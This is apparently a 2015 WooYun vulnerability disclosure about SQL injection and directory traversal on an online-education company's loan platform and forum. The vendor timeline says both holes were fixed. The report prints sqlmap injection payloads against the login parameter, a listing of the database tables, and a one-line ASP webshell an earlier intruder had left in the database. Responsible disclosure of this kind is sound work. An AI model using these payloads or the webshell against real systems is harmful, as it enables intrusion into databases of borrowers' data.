乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-10: 细节已通知厂商并且等待厂商处理中 2015-08-11: 厂商已经确认,细节仅向厂商公开 2015-08-20: 厂商已经修复漏洞并主动公开,细节向公众公开
注入+目录遍历
1.SQL注入E学贷管理平台http://credit.open.com.cn/Home/LoginSubmitdata="jizhu=0&loginname=-1&password="
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: POSTParameter: loginname Type: UNION query Title: Generic UNION query (NULL) - 9 columns Payload: jizhu=0&loginname=-1' UNION ALL SELECT CHAR(113)+CHAR(111)+CHAR(120)+CHAR(106)+CHAR(113)+CHAR(69)+CHAR(120)+CHAR(89)+CHAR(110)+CHAR(88)+CHAR(104)+CHAR(84)+CHAR(114)+CHAR(71)+CHAR(117)+CHAR(113)+CHAR(120)+CHAR(103)+CHAR(108)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &password= Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: jizhu=0&loginname=-1'; WAITFOR DELAY '0:0:5'--&password= Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: jizhu=0&loginname=-1' WAITFOR DELAY '0:0:5'--&password=---[03:31:20] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008 R2 or 7web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2008available databases [5]: [*] E_Loan[*] master[*] model[*] msdb[*] tempdb
Database: E_Loan [52 tables]+---------------------------+| 2015过年活动人员名单 || Dic_Activity_Type || Dic_Bank || Dic_CompanyScale || Dic_CompanyType || Dic_Connect_Type || Dic_Default_Rule || Dic_DutyType || Dic_EducationalStatus || Dic_FileBusiness_Type || Dic_MaritalStatus || Dic_Repay_Type || Dic_WorkYear || TBL_Activity_Group || TBL_Activity_Group || TBL_Actvity_User || TBL_Audit_Reason || TBL_Client_His || TBL_Client_His || TBL_Connect_Man_His || TBL_Connect_Man_His || TBL_Loan_Connect_Man_His || TBL_Loan_Connect_Man_His || TBL_Loan_EarlyRepay_His || TBL_Loan_EarlyRepay_His || TBL_Loan_File_Relevance || TBL_Loan_File_Relevance || TBL_Loan_FromCompany || TBL_Loan_Instalment_His || TBL_Loan_Instalment_His || TBL_Loan_Instalment_Input || TBL_Loan_Product || TBL_Loan_Rate || TBL_Loan_Record_His || TBL_Loan_Record_His || TBL_Loan_Record_Sequence || TBL_Loan_ToCompany || TBL_Login_Type || TBL_Menu_Url || TBL_Menu_Url || TBL_Notice_TiggerType || TBL_Notice_TiggerType || TBL_Notice_Type || TBL_Phone_ValidCode || TBL_Repay_Date || TBL_Role_Menu || TBL_Role_Menu || TBL_User_Menu || TBL_User_Menu || TBL_User_Role || cmd || sqlmapoutput |+---------------------------+
数据库被写入一句话木马,哦哦!!!
Database: E_LoanTable: cmd[1 entry]+-------------------------+| a |+-------------------------+| <%eval request("yun")%> |+-------------------------+
2.目录遍历奥鹏远程教育公共服务体系高峰论坛http://forum.open.com.cn
看看都被干了什么吧!
危害等级:高
漏洞Rank:18
确认时间:2015-08-11 15:01
已通知相关人员处理
2015-08-20:E学贷漏洞已修复forum站点已下线